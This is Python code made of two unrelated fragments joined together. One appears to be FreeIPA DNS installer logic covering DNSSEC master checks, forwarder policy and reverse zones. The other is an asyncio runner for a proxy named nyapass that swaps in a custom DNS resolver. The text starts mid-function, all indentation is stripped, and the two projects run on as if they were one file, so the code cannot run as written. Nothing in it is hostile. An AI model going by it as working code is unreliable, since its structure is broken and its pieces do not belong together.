raise RuntimeError("This IPA server cannot be promoted to "
"DNSSEC master role because some keys were "
"not replicated from the original "
"DNSSEC master server")
finally:
if dnskeysyncd_running:
dnskeysyncd.start()
elif dnssec_zones and not options.force:
# some zones have --dnssec=true, make sure a user really want to
# install new database
raise RuntimeError(
"DNSSEC signing is already enabled for following zone(s): %s\n"
"Installation cannot continue without the OpenDNSSEC database "
"file from the original DNSSEC master server.\n"
"Please use option --kasp-db to specify location "
"of the kasp.db file copied from the original "
"DNSSEC master server.\n"
"WARNING: Zones will become unavailable if you do not provide "
"the original kasp.db file." %
", ".join([str(zone) for zone in dnssec_zones]))
ip_addresses = get_server_ip_address(hostname, options.unattended,
True, options.ip_addresses)
util.no_matching_interface_for_ip_address_warning(ip_addresses)
if not options.forward_policy:
# user did not specify policy, derive it: default is 'first' but
# if any of local IP addresses belongs to private ranges use 'only'
options.forward_policy = 'first'
for ip in ip_addresses:
if dnsutil.inside_auto_empty_zone(dnsutil.DNSName(ip.reverse_dns)):
options.forward_policy = 'only'
logger.debug('IP address %s belongs to a private range, '
'using forward policy only', ip)
break
if options.no_forwarders:
options.forwarders = []
elif options.forwarders or options.auto_forwarders:
if not options.forwarders:
options.forwarders = []
if options.auto_forwarders:
options.forwarders += resolver.get_default_resolver().nameservers
elif standalone or not replica:
options.forwarders = read_dns_forwarders()
# test DNSSEC forwarders
if options.forwarders:
if (not bindinstance.check_forwarders(options.forwarders)
and not options.no_dnssec_validation):
options.no_dnssec_validation = True
print("WARNING: DNSSEC validation will be disabled")
logger.debug("will use DNS forwarders: %s\n", options.forwarders)
if not standalone:
search_reverse_zones = False
else:
search_reverse_zones = True
if not standalone and replica:
reverse_zones_unattended_check = True
else:
reverse_zones_unattended_check = options.unattended
reverse_zones = bindinstance.check_reverse_zones(
ip_addresses, options.reverse_zones, options,
reverse_zones_unattended_check, search_reverse_zones
)
if reverse_zones:
print("Using reverse zone(s) %s" % ', '.join(reverse_zones))
def nyapass_run_instances(config, *instances):
detect_nt()
setup_signal()
if config.use_custom_dns_resolver:
try:
from dns.resolver import (
Cache, get_default_resolver, override_system_resolver,
)
except ImportError:
log.warning(
"dnspython3 is not installed, "
"can't switch to custom resolver"
)
else:
resolver = get_default_resolver()
resolver.cache = Cache()
if config.custom_nameservers:
resolver.nameservers = list(config.custom_nameservers)
override_system_resolver(resolver)
import socket
old_getaddrinfo = socket.getaddrinfo
def fixed_gai(
host, port, family=0, type=0, proto=0, flags=0, **kwargs
):
# Workaround for different parameter name in dnspython
# (issue 123)
return old_getaddrinfo(
host, port, family, type, proto, flags, **kwargs
)
socket.getaddrinfo = fixed_gai
loop = asyncio.get_event_loop()
if config.threadpool_workers:
from concurrent.futures import ThreadPoolExecutor
loop.set_default_executor(ThreadPoolExecutor(
max_workers=config.threadpool_workers,
))
loop.run_until_complete(asyncio.gather(
*[x.init() for x in instances]
))
def _cleanup(disable_pending_task_warnings=False):
# Close the server
loop.run_until_complete(asyncio.gather(
*[x.shutdown() for x in instances]
))
loop.stop()
if disable_pending_task_warnings:
[t.result() for t in Task.all_tasks()]
loop.close()
try:
loop.run_forever()
except SystemExit:
try:
_cleanup(True)
except:
pass
raise
except KeyboardInterrupt:
pass
_cleanup()
